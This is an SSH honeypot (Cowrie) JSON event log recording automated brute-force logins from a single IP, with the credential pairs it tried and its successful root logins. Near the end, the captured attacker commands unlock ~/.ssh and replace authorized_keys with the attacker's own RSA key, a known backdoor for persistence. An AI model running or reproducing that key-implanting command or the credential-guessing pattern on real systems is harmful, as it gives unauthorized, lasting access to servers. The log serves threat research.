{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:52:24.914406Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:24.915283Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:25.114825Z","src_ip":"212.227.235.229","session":"d6ef3885da75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35164,"dst_ip":"1.2.3.4","dst_port":22,"session":"afede8184905","protocol":"ssh","message":"New connection: 212.227.235.229:35164 (1.2.3.4:22) [session: afede8184905]","sensor":"my-vps","timestamp":"2025-09-08T22:52:25.224413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:25.225188Z","src_ip":"212.227.235.229","session":"afede8184905"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:25.536346Z","src_ip":"212.227.235.229","session":"afede8184905"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:52:26.445717Z","src_ip":"212.227.235.229","session":"d6ef3885da75"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:26.768017Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:26.769903Z","src_ip":"212.227.235.229","session":"d6ef3885da75"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:52:26.823658Z","src_ip":"212.227.235.229","session":"afede8184905"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:28.138581Z","src_ip":"212.227.235.229","session":"afede8184905"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36234,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a1f98c08ff6","protocol":"ssh","message":"New connection: 212.227.235.229:36234 (1.2.3.4:22) [session: 5a1f98c08ff6]","sensor":"my-vps","timestamp":"2025-09-08T22:52:28.446301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:28.447201Z","src_ip":"212.227.235.229","session":"5a1f98c08ff6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:28.756757Z","src_ip":"212.227.235.229","session":"5a1f98c08ff6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38442,"dst_ip":"1.2.3.4","dst_port":22,"session":"8372aecfae97","protocol":"ssh","message":"New connection: 212.227.235.229:38442 (1.2.3.4:22) [session: 8372aecfae97]","sensor":"my-vps","timestamp":"2025-09-08T22:52:28.761638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:28.762410Z","src_ip":"212.227.235.229","session":"8372aecfae97"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:28.862530Z","src_ip":"212.227.235.229","session":"8372aecfae97"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"password123","message":"login attempt [nvidia/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:52:29.307449Z","src_ip":"212.227.235.229","session":"8372aecfae97"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:52:30.041676Z","src_ip":"212.227.235.229","session":"5a1f98c08ff6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:30.353428Z","src_ip":"212.227.235.229","session":"5a1f98c08ff6"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:30.354454Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:30.410338Z","src_ip":"212.227.235.229","session":"8372aecfae97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56790,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9c34d1dae24","protocol":"ssh","message":"New connection: 212.227.235.229:56790 (1.2.3.4:22) [session: d9c34d1dae24]","sensor":"my-vps","timestamp":"2025-09-08T22:52:41.159081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:41.159991Z","src_ip":"212.227.235.229","session":"d9c34d1dae24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:42.375961Z","src_ip":"212.227.235.229","session":"d9c34d1dae24"}
{"eventid":"cowrie.login.failed","username":"mithun","password":"mithun","message":"login attempt [mithun/mithun] failed","sensor":"my-vps","timestamp":"2025-09-08T22:52:43.129539Z","src_ip":"212.227.235.229","session":"d9c34d1dae24"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:44.382030Z","src_ip":"212.227.235.229","session":"d9c34d1dae24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60794,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed3554ee4284","protocol":"ssh","message":"New connection: 212.227.235.229:60794 (1.2.3.4:22) [session: ed3554ee4284]","sensor":"my-vps","timestamp":"2025-09-08T22:52:47.011547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:47.036774Z","src_ip":"212.227.235.229","session":"ed3554ee4284"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:47.282503Z","src_ip":"212.227.235.229","session":"ed3554ee4284"}
{"eventid":"cowrie.login.failed","username":"gitrun","password":"gitrun@123","message":"login attempt [gitrun/gitrun@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:52:48.278836Z","src_ip":"212.227.235.229","session":"ed3554ee4284"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:49.531985Z","src_ip":"212.227.235.229","session":"ed3554ee4284"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48162,"dst_ip":"1.2.3.4","dst_port":22,"session":"41418b83639a","protocol":"ssh","message":"New connection: 212.227.235.229:48162 (1.2.3.4:22) [session: 41418b83639a]","sensor":"my-vps","timestamp":"2025-09-08T22:53:03.018619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:53:03.019543Z","src_ip":"212.227.235.229","session":"41418b83639a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:53:03.120785Z","src_ip":"212.227.235.229","session":"41418b83639a"}
{"eventid":"cowrie.login.failed","username":"bin","password":"2025","message":"login attempt [bin/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:53:03.559735Z","src_ip":"212.227.235.229","session":"41418b83639a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:53:04.662551Z","src_ip":"212.227.235.229","session":"41418b83639a"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:53:06.151706Z","src_ip":"212.227.235.229","session":"826b739211be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51108,"dst_ip":"1.2.3.4","dst_port":22,"session":"c50eca269039","protocol":"ssh","message":"New connection: 212.227.235.229:51108 (1.2.3.4:22) [session: c50eca269039]","sensor":"my-vps","timestamp":"2025-09-08T22:53:21.958527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:53:21.959586Z","src_ip":"212.227.235.229","session":"c50eca269039"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:53:22.190317Z","src_ip":"212.227.235.229","session":"c50eca269039"}
{"eventid":"cowrie.login.failed","username":"db2admin","password":"Welcome1","message":"login attempt [db2admin/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:53:23.152671Z","src_ip":"212.227.235.229","session":"c50eca269039"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:53:24.386141Z","src_ip":"212.227.235.229","session":"c50eca269039"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59764,"dst_ip":"1.2.3.4","dst_port":22,"session":"103c4d9c2955","protocol":"ssh","message":"New connection: 212.227.235.229:59764 (1.2.3.4:22) [session: 103c4d9c2955]","sensor":"my-vps","timestamp":"2025-09-08T22:53:25.681795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:53:25.682880Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:53:26.016271Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.login.success","username":"root","password":"1221","message":"login attempt [root/1221] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:53:27.390714Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:53:28.144005Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:53:28.144673Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:53:28.145806Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:53:28.480508Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:53:29.224776Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:53:29.225437Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
